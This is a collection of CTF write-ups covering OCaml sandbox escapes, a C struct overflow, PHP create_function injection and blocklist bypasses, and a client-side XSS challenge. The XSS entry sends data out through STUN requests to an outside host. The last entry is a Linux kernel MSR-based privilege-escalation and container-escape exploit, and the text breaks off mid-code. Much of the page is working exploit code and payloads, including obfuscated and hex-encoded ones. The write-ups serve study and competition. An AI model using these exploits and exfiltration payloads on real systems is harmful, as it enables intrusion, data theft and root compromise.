external open_descriptor_in : int -> in_channel = "caml_ml_open_descriptor_in";;
external output_char : out_channel -> char -> unit = "caml_ml_output_char";;
external input_char : in_channel -> char = "caml_ml_input_char";;

let open_in name =
    open_descriptor_in (open_desc name [Open_rdonly; Open_text] 0)
;;

let stdout = open_descriptor_out 1;;
let flag = open_in "flag.txt";;

(* read recursively until error *)
let rec f () =
    output_char stdout (input_char flag);
    f ()
;;

f()

After this solve I also found a much shorter one (possibly unintended). To prevent module collisions the compiler mangles module names (Parent.Child becomes Parent__Child). The Stdlib is not an exception to this, and Nocaml does not block those internal names. So we can simply do:

Stdlib__Sys.command "cat flag.txt"

In both cases

$ (base64 -w0 solve.ml; echo) | ncat --no-shutdown --ssl nocaml.chal.uiuc.tf 1337
== proof-of-work: disabled ==
uiuctf{nocaml_79976241e31bee31e37c42885}

To conclude, I liked this challenge quite a bit. Coming into this with OCaml experience, the solutions felt natural and intuitive.

UIUCTF 25 - QAS

info@theromanxpl0.it (TRX) — Mon, 28 Jul 2025 11:21:17 +0200

The challenge computes the hash of an integer we provide and prints the flag if the hashed output matches a constant.

The code is very straightforward and the only annoyance is the usage of confusing type names for integer types.

Here’s the code stripped from comments:

typedef int not_int_small;
typedef short int_small;
typedef int not_int_big;
typedef not_int_small int_big;
typedef unsigned char quantum_byte;
typedef quantum_byte* quantum_ptr;

typedef struct {
    not_int_big val;
} PASSWORD_QUANTUM;

typedef struct {
    int_small val;
    quantum_byte padding[2];
    quantum_byte checksum;
    quantum_byte reserved;
} INPUT_QUANTUM;

typedef struct quantum_data_s quantum_data_t;
struct __attribute__((packed)) quantum_data_s {
    INPUT_QUANTUM input;
    PASSWORD_QUANTUM password;
    quantum_byte entropy_pool[8];
    quantum_byte quantum_state[16];
};

static inline quantum_byte generate_quantum_entropy() {
    static quantum_byte seed = 0x42;
    seed = ((seed << 3) ^ (seed >> 5)) + 0x7f;
    return seed;
}

void init_quantum_security(quantum_data_t* qdata) {
    for (int i = 0; i < 8; i++) {
        qdata->entropy_pool[i] = generate_quantum_entropy();
    }
    for (int i = 0; i < 16; i++) {
        qdata->quantum_state[i] = (quantum_byte)(i * 0x11 + 0x33);
    }

    qdata->input.padding[0] = 0;
    qdata->input.padding[1] = 0;
}

not_int_big quantum_hash(INPUT_QUANTUM input, quantum_byte* entropy) {
    int_small input_val = input.val;
    not_int_big hash = input_val;

    hash ^= (entropy[0] << 8) | entropy[1];
    hash ^= (entropy[2] << 4) | (entropy[3] >> 4);
    hash += (entropy[4] * entropy[5]) & 0xff;
    hash ^= entropy[6] ^ entropy[7];
    hash |= 0xeee;
    hash ^= input.padding[0] << 8 | input.padding[1];
    return hash;
}

void access_granted() {
    printf("Quantum authentication successful!\n");
    printf("Accessing secured vault...\n");

    FILE *fp = fopen("flag.txt", "r");
    if (fp == NULL) {
        printf("Error: Quantum vault is offline\n");
        printf("Please contact the quantum administrator.\n");
        return;
    }

    char flag[100];
    if (fgets(flag, sizeof(flag), fp) != NULL) {
        printf("CLASSIFIED FLAG: %s\n", flag);
    } else {
        printf("Error: Quantum decryption failed\n");
        printf("Please contact the quantum administrator.\n");
    }
    fclose(fp);
}

int main() {
    quantum_data_t qdata;

    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);

    init_quantum_security(&qdata);
    qdata.password.val = 0x555;

    printf("=== QUANTUM AUTHENTICATION SYSTEM v2.7.3 ===\n");
    printf("Initializing quantum security protocols...\n");

    for (volatile int i = 0; i < 100000; i++) { }

    printf("Quantum entropy generated. System ready.\n");
    printf("Please enter your quantum authentication code: ");

    // qdata.input.val is a short !!!
    if (scanf("%d", (int*)&qdata.input.val) != 1) {
        printf("Invalid quantum input format!\n");
        return 1;
    }

    qdata.input.checksum = (quantum_byte)(qdata.input.val & 0xff);
    not_int_big hashed_input = quantum_hash(qdata.input, qdata.entropy_pool);

    printf("Quantum hash computed: 0x%x\n", hashed_input);
    if (hashed_input == qdata.password.val) {
        access_granted();
    } else {
        printf("Quantum authentication failed!\n");
        printf("Access denied. Incident logged.\n");
    }
    return 0;
}

Since the constant is known (0x555) and the domain of the input is small (32-bit), we can just bruteforce it!

Valid solutions can be found by changing the main function like so:

int main() {
    quantum_data_t qdata;
    qdata.password.val = 0x555;

    for (int i = INT_MIN; i < INT_MAX; i++) {
        seed = 0x42;
		init_quantum_security(&qdata);

		memcpy(&qdata.input.val, &i, sizeof(int));
		qdata.input.checksum = (quantum_byte)(qdata.input.val & 0xff);
		int hashed_input = quantum_hash(qdata.input, qdata.entropy_pool);

		if (hashed_input == qdata.password.val) {
			printf("Found %d\n", i);
		}
    }
	printf("Done\n");
}

In a few seconds we find a lot of negative numbers (32560 to be exact) that match our expected hash!

...
Found -1141148752
Found -1141148750
Found -1141148748
Found -1141148746
Found -1141148744
...

Now we can profit:

$ ncat --ssl qas.chal.uiuc.tf 1337
== proof-of-work: disabled ==
=== QUANTUM AUTHENTICATION SYSTEM v2.7.3 ===
Initializing quantum security protocols...
Quantum entropy generated. System ready.
Please enter your quantum authentication code: -1141148674
Quantum hash computed: 0x555
Quantum authentication successful!
Accessing secured vault...
CLASSIFIED FLAG: uiuctf{qu4ntum_0v3rfl0w_2d5ad975653b8f29}

With the cheesy solution out of the way, what is the vuln here?

scanf("%d", (int*)&qdata.input.val) reads 4 bytes into the input struct. But the val field is a short! Since the struct is packed, this means that we are overwriting the following field, which in this case is a char[2] called padding.

Contrary to common sense, this field is actually used in the hash function: hash ^= input.padding[0] << 8 | input.padding[1];

By providing certain negative numbers we can obtain the right output value and win. Also note that there are no positive solutions.

CornCTF 2025 - phpislovephpislife 3

info@theromanxpl0.it (TRX) — Mon, 28 Jul 2025 00:00:00 +0000

As the title suggests, straightforward PHP shenanigans.

Let’s dive in.

Overview

There’s only one file we need to look at, and the author has been kind enough to highlight the relevant parts for us

if (isset($_POST['code'])) {

    $code = $_POST['code'];
    // I <3 blacklists
    $characters = ['\`', '\[', '\*', '\.', '\\\\', '\=', '\+', '\$'];
    $classes = get_declared_classes();
    $functions = get_defined_functions()['internal'];
    $strings = ['eval', 'include', 'require', 'function', 'flag', 'echo', 'print', '\$.*\{.*\$', '\}[^\{]*\}', '?>'];
    $variables = ['_GET', '_POST', '_COOKIE', '_REQUEST', '_SERVER', '_FILES', '_ENV', 'HTTP_ENV_VARS', '_SESSION', 'GLOBALS', 'variables', 'strings', 'blacklist', 'functions', 'classes', 'code'];

    $blacklist = array_merge($characters, $classes, $functions, $variables, $strings);

    foreach ($blacklist as $blacklisted) {

        if (preg_match('/' . $blacklisted . '/im', $code)) {

            $output = 'No hacks pls';
        }
    }

    if (count($_GET) != 0 || count($_POST) > 1) {
        $output = 'No hacks pls';
    }

    if (!isset($output)) {
        $my_function = create_function('', $code);
        // $output = $my_function(); // I don't trust you
        $output = 'This function is disabled.';
    }
    echo $output;
}

There’s a pretty strict blacklist in place that won’t allow us to use any of the convenient php tools to carry out our exploit: no built-in functions, no superglobals and very few available symbols.

What are we exploiting exactly?

This part right here:

    if (!isset($output)) {
        $my_function = create_function('', $code);
        // $output = $my_function(); // I don't trust you
        $output = 'This function is disabled.';
    }
    echo $output;

The author thought cleverly to stop our function from executing by commenting $output out, unfortunately for him, though, create_function still takes our input as an argument, so we can just insert our own comment at the end of our inputted code and let the eval that create_function runs internally do its magic.

How does this work exactly

Internally, eval does something of the sort:

$wrapper = 'function __lambda'.$uniq.'() { ' . $code . '; }';

and then runs eval($wrapper)

Everything inside {} doesn’t get executed but is rather defined as the function’s body; however, if we close the curly bracket at the start of our injected code, we can leave the function’s context and eval will execute our code, granting us RCE.

But how do we take advantage of this?

There are a few flaws in the blacklist implementation, notably, it allows die() and several symbols that we can use to craft a payload.

Exploitation phase

With a bit of fuzzing and recalling that PHP allows operations on strings such as XOR, we can obfuscate our input die(getenv(flag)) in such a way that it bypasses the blocklist.

Final payload:

};die(('WUDU^F'^'000000')(('v|qw')^'0000'));//

'WUDU^F'^'000000' is getenv xorred
'v|qw')^'0000' is FLAG xorred

This is only possible because PHP allows functions to be called by referencing them as strings

https://www.youtube.com/watch?v=hRnUR7fJdaU&list=RDhRnUR7fJdaU&start_radio=1

L3akCTF 2025 - Certay

info@theromanxpl0.it (TRX) — Mon, 28 Jul 2025 00:00:00 +0000

A mixture of variable confusion, type juggling and broken crypto, let’s take a look.

Examining the vulnerability

We have a few different files at our disposal, but the only one we care about is dashboard.php.

There are a few glaring issues with the code that stand out at a glance

define('yek', $_SESSION['yek']);          
...
if (!isset($_SESSION['yek'])) {           
    $_SESSION['yek'] = openssl_random_pseudo_bytes(
        openssl_cipher_iv_length('aes-256-cbc')
    );
}

At first, this could seem like it spells disaster for us, if it wasn’t for the fact that yek isn’t actually used in the code:

if (custom_sign($_GET['msg'], $yek, safe_sign($_GET['key'])) === $_GET['hash'])

This custom_sign function takes in $yek instead, which is undefined.

Likewise, safe_sign uses iv, which is also undefined, this causes PHP to take ‘iv’ as a literal instead

function safe_sign($data) {
    return openssl_encrypt($data, 'aes-256-cbc', KEY, 0, iv);
}

(Note: this behavior has been deprecated in recent versions)

KEY is hard-coded in config.php, but we don’t really care about that.

Why?

The exploit

We can use PHP type juggling to input the key parameter as an array instead of a string:

dashboard.php?key[]=foo

This makes safe_sign return NULL, which in turn grants us the ability to fully manipulate custom_sign:

custom_sign($_GET['msg'], $yek, safe_sign($_GET['key'])) === custom_sign($_GET['msg'], NULL, NULL)

This is equivalent to

openssl_encrypt($msg, 'aes-256-cbc', NULL, 0, NULL)

We can therefore calculate the hash offline for a specific message and use it, along with said message, to access this part of the code:

        echo "Wow! Hello buddy I know you! Here is your secret files:
";
        $stmt = $db->prepare("SELECT content FROM notes WHERE user_id = ?");
        $stmt->execute([$_SESSION['user_id']]);
        $notes = $stmt->fetchAll(PDO::FETCH_ASSOC);
        if (!$notes) {
            echo "Nothing here.
";
        } else {
            foreach ($notes as $note) {
                $content = $note['content'];
                if (strpos($content, '`') !== false) {
                    echo 'You are a betrayer!';
                    continue;
                }
                $isBetrayal = false;
                foreach ($dangerous as $func) {
                    if (preg_match('/\b' . preg_quote($func, '/') . '\s*\(/i', $content)) {
                        $isBetrayal = true;
                        break;
                    }
                }
                if ($isBetrayal) {
                    echo 'You are a betrayer!';
                    continue;
                }
                try {
                    eval($content);
                } catch (Throwable $e) {
                    echo "Eval error: "
                    . htmlspecialchars($e->getMessage())
                    . "
";
                }
            }
        }

But we still have to bypass the blocklist:

$dangerous = [
'exec', 'shell_exec', 'system', 'passthru', 'proc_open', 'popen', '$', '`',
'curl_exec', 'curl_multi_exec', 'eval', 'assert', 'create_function',
'include', 'include_once', 'require', 'require_once', "file_get_contents",
'readfile', 'fopen', 'fwrite', 'fclose', 'unlink', 'rmdir',
'copy', 'rename', 'chmod', 'chown', 'chgrp', 'touch', 'mkdir',
'rmdir', 'fseek', 'fread', 'fgets', 'fgetcsv',
'file_put_contents', 'stream_get_contents', 'stream_copy_to_stream',
'stream_get_line', 'stream_set_blocking', 'stream_set_timeout',
'stream_select', 'stream_socket_client', 'stream_socket_server',
'stream_socket_accept', 'stream_socket_recvfrom', 'stream_socket_sendto',
'stream_socket_get_name', 'stream_socket_pair', 'stream_context_create',
'stream_context_set_option', 'stream_context_get_options'
];

But that’s easy enough: highlight_file('/tmp/flag.txt'); will do.

Putting it all together

Let’s compute the hash for message testmessage offline:

$msg  = 'testmessage';                     // scegli tu
$hash = openssl_encrypt('testmessage', 'aes-256-cbc', NULL, 0, NULL);
echo $hash;                        
?>

E/fVzDJCHnsOolo60416CQ==

The final payload thus becomes:

`dashboard.php?key[]=foo&msg=testmessage&hash=E/fVzDJCHnsOolo60416CQ==`

`highlight_file('/tmp/flag.txt');`

L3AK{N0t_4_5ecret_4nYm0r3333!!5215kgfr5s85z9}

TRX CTF 25 - Baby Sandbox

info@theromanxpl0.it (TRX) — Wed, 26 Feb 2025 00:00:00 +0000

This is an easy client-side challenge

Overview

We’re given a few files

server.js: Contains the server code. We can see that the server serves files with a strict CSP:

app.use((req, res, next) => {
    res.setHeader("Content-Security-Policy", "default-src 'none'; frame-ancestors 'none'; base-uri 'none'; form-action 'none'; script-src 'self' 'unsafe-inline';");
    next()
})

iframe.ejs: A simple HTML file with an obvious HTML injection:

      let d = document.createElement("div");
      d.innerHTML = "<%= payload %>";
      document.body.appendChild(d);

index.ejs: The content of index.ejs will be put inside an iframe
bot.js: Contains the bot code. It’s clear that the flag will be stored in local storage. We can supply a payload to the visit function, which will then be viewed by the bot. Note that the bot will sleep for a short period after viewing our payload.

Finally, before inserting our payload, the flag will be placed inside a closed shadow DOM, making it inaccessible from JavaScript.

To bypass this restriction, we can use a deprecated feature: document.execCommand

Specifically, we can use a lesser-known command: findstring:

document.execCommand("findstring", false, ), returns true if the substring is found, and false otherwise. I found it here

After brute-forcing the flag, we can split it into chunks and exfiltrate it using WebRTC or any other method that does not violate the CSP.

Note: since our payload will be escaped, we had to encode it using the following function

def encode(payload):
    result = ""
    for c in payload:
        result += "\\x" + hex(ord(c))[2:].zfill(2)
    return result

Final Exploit

(() => {
    function toHex(str) {
        let hex = '';
        for(let i = 0; i < str.length; i++) {
            hex += str.charCodeAt(i).toString(16);
        }
        return hex;
    }

    let flag = "TRX{";
    let charset = "abcdefghijklmnopqrstuvwxyz0123456789_{}";
    for(let i = 0; i < 128; i++){
        for(let c in charset){
            res = document.execCommand("findstring", false, flag+charset[c]);
            if(res){
                flag += charset[c];
                break;
            }
        }
    }

    let chunkSize = 4;
    for (let i = 0; i < flag.length; i += chunkSize) {
        let chunk = flag.substring(i, i + chunkSize);
        console.log(chunk);
        let pc = new RTCPeerConnection({"iceServers":[{"urls":["stun:" + toHex(chunk) + "." + i + ".az5f3of1.requestrepo.com"]}]});
        pc.createOffer({offerToReceiveAudio:1}).then(o => pc.setLocalDescription(o)).catch(e => console.error(e));
    }
    })();

You can then compress this and put it inside an img tag:

"#" onerror='(()=>{let o="TRX{";var r="abcdefghijklmnopqrstuvwxyz0123456789_{}";for(let e=0;e<128;e++)for(var t in r)res=document.execCommand("findstring",!1,o+r[t]),res&&(o+=r[t]);for(let e=0;er.setLocalDescription(e)).catch(e=>console.error(e))}})();'>

Encoded payload:

\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x22\x23\x22\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x27\x28\x28\x29\x3d\x3e\x7b\x6c\x65\x74\x20\x6f\x3d\x22\x54\x52\x58\x7b\x22\x3b\x76\x61\x72\x20\x72\x3d\x22\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x5f\x7b\x7d\x22\x3b\x66\x6f\x72\x28\x6c\x65\x74\x20\x65\x3d\x30\x3b\x65\x3c\x31\x32\x38\x3b\x65\x2b\x2b\x29\x66\x6f\x72\x28\x76\x61\x72\x20\x74\x20\x69\x6e\x20\x72\x29\x72\x65\x73\x3d\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x65\x78\x65\x63\x43\x6f\x6d\x6d\x61\x6e\x64\x28\x22\x66\x69\x6e\x64\x73\x74\x72\x69\x6e\x67\x22\x2c\x21\x31\x2c\x6f\x2b\x72\x5b\x74\x5d\x29\x2c\x72\x65\x73\x26\x26\x28\x6f\x2b\x3d\x72\x5b\x74\x5d\x29\x3b\x66\x6f\x72\x28\x6c\x65\x74\x20\x65\x3d\x30\x3b\x65\x3c\x6f\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x65\x2b\x3d\x34\x29\x7b\x76\x61\x72\x20\x6e\x3d\x6f\x2e\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x65\x2c\x65\x2b\x34\x29\x3b\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x6c\x6f\x67\x28\x6e\x29\x3b\x6c\x65\x74\x20\x72\x3d\x6e\x65\x77\x20\x52\x54\x43\x50\x65\x65\x72\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x28\x7b\x69\x63\x65\x53\x65\x72\x76\x65\x72\x73\x3a\x5b\x7b\x75\x72\x6c\x73\x3a\x5b\x22\x73\x74\x75\x6e\x3a\x22\x2b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x72\x29\x7b\x6c\x65\x74\x20\x6f\x3d\x22\x22\x3b\x66\x6f\x72\x28\x6c\x65\x74\x20\x65\x3d\x30\x3b\x65\x3c\x72\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x65\x2b\x2b\x29\x6f\x2b\x3d\x72\x2e\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74\x28\x65\x29\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67\x28\x31\x36\x29\x3b\x72\x65\x74\x75\x72\x6e\x20\x6f\x7d\x28\x6e\x29\x2b\x22\x2e\x22\x2b\x65\x2b\x22\x2e\x61\x7a\x35\x66\x33\x6f\x66\x31\x2e\x72\x65\x71\x75\x65\x73\x74\x72\x65\x70\x6f\x2e\x63\x6f\x6d\x22\x5d\x7d\x5d\x7d\x29\x3b\x72\x2e\x63\x72\x65\x61\x74\x65\x4f\x66\x66\x65\x72\x28\x7b\x6f\x66\x66\x65\x72\x54\x6f\x52\x65\x63\x65\x69\x76\x65\x41\x75\x64\x69\x6f\x3a\x31\x7d\x29\x2e\x74\x68\x65\x6e\x28\x65\x3d\x3e\x72\x2e\x73\x65\x74\x4c\x6f\x63\x61\x6c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x28\x65\x29\x29\x2e\x63\x61\x74\x63\x68\x28\x65\x3d\x3e\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x65\x72\x72\x6f\x72\x28\x65\x29\x29\x7d\x7d\x29\x28\x29\x3b\x27\x3e

TRX CTF 25 - Baby Small

info@theromanxpl0.it (TRX) — Wed, 26 Feb 2025 00:00:00 +0000

Link to the official blogpost: https://kqx.io/writeups/baby_small/

Description

im a baby and im small

DISCLAIMER: This challenge was rated “insane” from the pwners of the team, please reconsider approaching the challenge

NOTE: In order to make the intended exploit more reliable CONFIG_HZ is set to 100

Challenge overview

The challenge provides a weird primitive, that we can call Arbitrary MSR Write.

Little bit of theory about MSRs: A model specific register is any of various control registers used for debugging, enabling specific CPU features and performance monitoring. Some examples are: EFER used (among other things) to specify if the NX protection or Long Mode are active, or LSTAR in which is contained the virtual address the CPU will jump in kernelspace after executing the syscall instruction.

Exploitation

The first path that comes to mind is overwriting LSTAR to gain kernel RIP hijacking, but there’s still a problem: leaks. During play-testing this path appeared to be a dead end (curious about unintended solves).

Exploitation overview

The intended path uses 2 interactions with the driver: one for MSR_SYSCALL_MASK and one for MSR_GS_BASE. The idea is to disable SMAP and fake a kernelspace stack in userland which we can use to leak addresses and achieve RIP hijacking.

We can disable SMAP for these reasons:

the AC bit in EFLAGS can be set in userland
during the syscall instruction RFLAGS := RFLAGS AND NOT(IA32_FMASK) happens (https://www.felixcloutier.com/x86/syscall)
by modifying MSR_FLAG_MASK we can tell “syscall” to not zero out the AC bit

As said, now the idea is to create a fake GS in userland, but why do we want this? In the entry_SYSCALL_64 function, which is the first function that gets executed in kernelspace after the syscall instruction, the kernelspace stack gets fetched from an address, which is GS-based. So we can craft a fake GS in userland which: won’t result in a kpanic (because of a null-ptr dereference, for example) and will fetch a userland address for the kernelspace RSP.

All safe and sound ’till here, the problem is that MSR_GS_BASE is CPU specific, which means that if an hardware context switch happens, the new process that will be run will also use the fake GS, and not the real one, which will, for sure, trigger a kpanic because syscalls needs an actual GS (and for god’s sake do not try to fake it all). So we end up in a race where if an hardware context switch happens during the window that starts from the driver’s wrmsr instruction and ends at the ROPchain execution (where we’ll fix GS) a kpanic will be triggered. Is there a way to make this “race” more reliable? During play-testing we did not find such a way, so this is why CONFIG_HZ is set to 100, given that the default one is 1000, which means that an hardware context swtich happens every 10ms (instead of 1ms) which makes the race 10 times more reliable.

Lore moment

The original kernel image (with CONFIG_HZ=1000) made the exploit unreliable with a success rate of 20-25%. But as soon as my laptop battery would go under the 20% of charge, the exploit would completely stop working, with the only (apparent) fix being plugging in the charger. After several days of analysis I came to the conclusion that the battery being low triggers the “Power Saver Mode”, which (among other things) makes the CPU run slower: the hardware context switch has a fixed clock (every 1ms) and we have to run N instructions in that 1ms, with the CPU being slowed down, we are not able to run those N instructions triggering an hardware context switch which will result in a kpanic. So one day @prosti randomly said: CONFIG_HZ

The choice of changing CONFIG_HZ was not made in order to make the challenge actually exploitable, because the exploit would still work, but we wanted to enlarge the race window.

Back to exploitation

So to win the race I used two processes pinned on two different CPUs and synchronized them through semaphores allocated on shared memory.

The parent’s tasks are:

wait for the child to fake GS (just some values needed to not trigger null pointer dereference in the syscall ret2user + the fake stack)
set AC bit on (this must be done BEFORE changing GS)
change GS
call a ni_syscall (not implemented syscall) to make leaks end up on the fake stack
looping a ni_syscall, which will be hijacked by the child process

The child’s tasks are:

fake gs
wait until virtual kbase gets leaked by parent
write the ROPchain on the fake stack
loop the POP RSP; ret + &ropchain write on the kernelspace fake stack to overwrite the return address

The ROPchain must:

fix GS, to do so you can use an Arbitrary Read gadget (I jumped in the middle of rep_movs_alternative which is used in copy_to/from_user) to leak page_offset_base and then add 0x3ea00000 to get the actual GS base (yeah, GS’ phys address is predictable)
escalate privileges: commit_creds(&init_cred)
escape container
- change shell’s namespace
- assign a copy of init_fs struct to exploit task
ret2user

Now system("/bin/sh") and profit :)

Full exploit

// #define DBG
#include  "kpwn.c"

#define MSR_SYSCALL_MASK 0xc0000084
#define MSR_KERNEL_GS_BASE 0xc0000101

#define EFLAGS_MASK 0x257fd5  ^  0x40000
#define KERNEL_GS 0x10000
#define GS_SIZE 0x2d000

#define PHYS_GS 0x3ea00000

#define POP_RSP 0xfe760
#define POP_RDI 0xda228d
#define POP_RSI 0x2527cc
#define POP_RCX 0xa3e793
#define POP_RDX 0x67ad92

#define ADD_DWORD_RSIRDX1_ESI 0xaa4063
#define REP_MOVS_ALTERNATIVE 0x101ed10
#define PAGE_OFFSET_BASE 0x19ea178
#define WRMSR 0x1201886

#define INIT_CRED 0x1c501d0
#define COMMIT_CREDS 0xcd3b0
#define FIND_TASK_BY_VPID 0xbf9a0
#define MOV_QWORD_RDI_RAX REP_MOVS_ALTERNATIVE+3
#define INIT_NSPROXY 0x1c4fd10
#define SWITCH_TASK_NAMESPACES 0xca960
#define INIT_FS 0x1d71f20
#define COPY_FS_STRUCT 0x31e6b0
#define SWAPGS_AND_SHIT 0x12015d0  +  0x67


void  win(){
	system("/bin/sh");
}

void  naked_syscall(){
	asm  volatile (
		".intel_syntax  noprefix\n"
		"mov  rax, 0x6969\n"
		"syscall\n"
		".att_syntax  prefix\n"
		:
		:
		: "rax"
	);
}


int  main(){
	pin_cpu(0);

	int fd =  open("/dev/msr", O_RDONLY);
	char* kgsbase;
	char* fake_stack;
	ul* kbase;
	int parent_child =  getpid();

	ul rsp;
	__asm__  volatile ("mov %%rsp, %0" : "=r"(rsp));

	stop("set eflags mask");
	ioctl(fd, MSR_SYSCALL_MASK, EFLAGS_MASK);

	stop("set fake kernel gs base");
	fake_stack = (char*) mmap(NULL, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
	kgsbase = (char*) mmap((void* ) KERNEL_GS, GS_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
	kbase = (ul*) mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);

	int pid =  fork();
	if (!pid){
		pin_cpu(1);
		memset(fake_stack, 0, 0x2000);
		memset(kbase, 0, 0x1000);
		memset(kgsbase, 0, GS_SIZE);

		*(ul*) &kgsbase[0x2be40] = (ul) kgsbase;
		*(ul*) &kgsbase[0x6004] = (ul) fake_stack +  0x1000;
		*(ul*) &kgsbase[0x2be58] = (ul) fake_stack +  0x1000;
		char* chain = fake_stack+0x1000;

		*&kbase[1] =  1;
		while (!*kbase){} // wait for parent to overwrite MSR_KERNEL_GS_BASE and leak kaslr

		// set correct gs
		*(ul*) &fake_stack[0x1000] = POP_RDI +  *kbase;
		*(ul*) &fake_stack[0x1008] = (ul) &fake_stack[0x1068];
		*(ul*) &fake_stack[0x1010] = POP_RSI +  *kbase;
		*(ul*) &fake_stack[0x1018] = PAGE_OFFSET_BASE +  *kbase;
		*(ul*) &fake_stack[0x1020] = POP_RCX +  *kbase;
		*(ul*) &fake_stack[0x1028] =  8;
		*(ul*) &fake_stack[0x1030] = REP_MOVS_ALTERNATIVE +  *kbase;
		*(ul*) &fake_stack[0x1038] = POP_RSI +  *kbase;
		*(ul*) &fake_stack[0x1040] = PHYS_GS;
		*(ul*) &fake_stack[0x1048] = POP_RDX +  *kbase;
		*(ul*) &fake_stack[0x1050] = (ul) &fake_stack[0x1068] - PHYS_GS -  1;
		*(ul*) &fake_stack[0x1058] = ADD_DWORD_RSIRDX1_ESI +  *kbase;
		*(ul*) &fake_stack[0x1060] = POP_RDX +  *kbase;
		*(ul*) &fake_stack[0x1068] =  0x6969696969696969;
		*(ul*) &fake_stack[0x1070] = POP_RCX +  *kbase;
		*(ul*) &fake_stack[0x1078] = MSR_KERNEL_GS_BASE;
		*(ul*) &fake_stack[0x1080] = WRMSR +  *kbase;

		// commit_creds(init_cred)
		*(ul*) &fake_stack[0x1088] = POP_RDI +  *kbase;
		*(ul*) &fake_stack[0x1090] = INIT_CRED +  *kbase;
		*(ul*) &fake_stack[0x1098] = COMMIT_CREDS +  *kbase;

		// task = find_task_by_vpid(1)
		*(ul*) &fake_stack[0x10a0] = POP_RDI +  *kbase;
		*(ul*) &fake_stack[0x10a8] =  1;
		*(ul*) &fake_stack[0x10b0] = FIND_TASK_BY_VPID +  *kbase;

		// switch_task_namespaces(task, init_nsproxy)
		*(ul*) &fake_stack[0x10b8] = POP_RDI +  *kbase;
		*(ul*) &fake_stack[0x10c0] = (ul) &fake_stack[0x10e8];
		*(ul*) &fake_stack[0x10c8] = POP_RCX +  *kbase;
		*(ul*) &fake_stack[0x10d0] =  8;
		*(ul*) &fake_stack[0x10d8] = MOV_QWORD_RDI_RAX +  *kbase;
		*(ul*) &fake_stack[0x10e0] = POP_RDI +  *kbase;
		*(ul*) &fake_stack[0x10e8] =  0x6969696969696969;
		*(ul*) &fake_stack[0x10f0] = POP_RSI +  *kbase;
		*(ul*) &fake_stack[0x10f8] = INIT_NSPROXY +  *kbase;
		*(ul*) &fake_stack[0x1100] = SWITCH_TASK_NAMESPACES +  *kbase;

		// new_fs = copy_fs_struct(init_fs)
		*(ul*) &fake_stack[0x1108] = POP_RDI +  *kbase;
		*(ul*) &fake_stack[0x1110] = INIT_FS +  *kbase;
		*(ul*) &fake_stack[0x1118] = COPY_FS_STRUCT +  *kbase;

		// save "somewhere" new_fs
		*(ul*) &fake_stack[0x1120] = POP_RDI +  *kbase;
		*(ul*) &fake_stack[0x1128] = (ul) &fake_stack[0x1f00];
		*(ul*) &fake_stack[0x1130] = POP_RCX +  *kbase;
		*(ul*) &fake_stack[0x1138] =  8;
		*(ul*) &fake_stack[0x1140] = MOV_QWORD_RDI_RAX +  *kbase;

		// task = find_task_by_vpid(getpid())
		*(ul*) &fake_stack[0x1148] = POP_RDI +  *kbase;
		*(ul*) &fake_stack[0x1150] = (ul) parent_child;
		*(ul*) &fake_stack[0x1158] = FIND_TASK_BY_VPID +  *kbase;

		// current->fs = newfs
		*(ul*) &fake_stack[0x1160] = POP_RDI +  *kbase;
		*(ul*) &fake_stack[0x1168] = (ul) &fake_stack[0x11b8];
		*(ul*) &fake_stack[0x1170] = POP_RCX +  *kbase;
		*(ul*) &fake_stack[0x1178] =  8;
		*(ul*) &fake_stack[0x1180] = MOV_QWORD_RDI_RAX +  *kbase;
		*(ul*) &fake_stack[0x1188] = POP_RSI +  *kbase;
		*(ul*) &fake_stack[0x1190] =  0x760;
		*(ul*) &fake_stack[0x1198] = POP_RDX +  *kbase;
		*(ul*) &fake_stack[0x11a0] = (ul) &fake_stack[0x11b8] -  0x760  -  1;
		*(ul*) &fake_stack[0x11a8] = ADD_DWORD_RSIRDX1_ESI +  *kbase;
		*(ul*) &fake_stack[0x11b0] = POP_RDI +  *kbase;
		*(ul*) &fake_stack[0x11b8] =  0x6969696969696969;
		*(ul*) &fake_stack[0x11c0] = POP_RSI +  *kbase;
		*(ul*) &fake_stack[0x11c8] = (ul) &fake_stack[0x1f00];
		*(ul*) &fake_stack[0x11d0] = POP_RCX +  *kbase;
		*(ul*) &fake_stack[0x11d8] =  8;
		*(ul*) &fake_stack[0x11e0] = REP_MOVS_ALTERNATIVE +  *kbase;

		// ret2user
		*(ul*) &fake_stack[0x11e8] = SWAPGS_AND_SHIT +  *kbase;
		*(ul*) &fake_stack[0x11f0] =  0;
		*(ul*) &fake_stack[0x11f8] =  0;
		*(ul*) &fake_stack[0x1200] = (ul) &win;
		*(ul*) &fake_stack[0x1208] =  0x33;
		*(ul*) &fake_stack[0x1210] =  0x206;
		*(ul*) &fake_stack[0x1218] = rsp;
		*(ul*) &fake_stack[0x1220] =  0x2b;

		while (1){
			*(ul*) &fake_stack[0xf50] = POP_RSP +  *kbase;
			*(ul*) &fake_stack[0xf58] = (ul) chain;
		};

		return  0;
	}

	while (!*&kbase[1]){} // wait for child to fake gs

	asm  volatile (
		".intel_syntax  noprefix\n"
		"push  0x40206\n"
		"popf\n"
		".att_syntax  prefix"
		:
		:
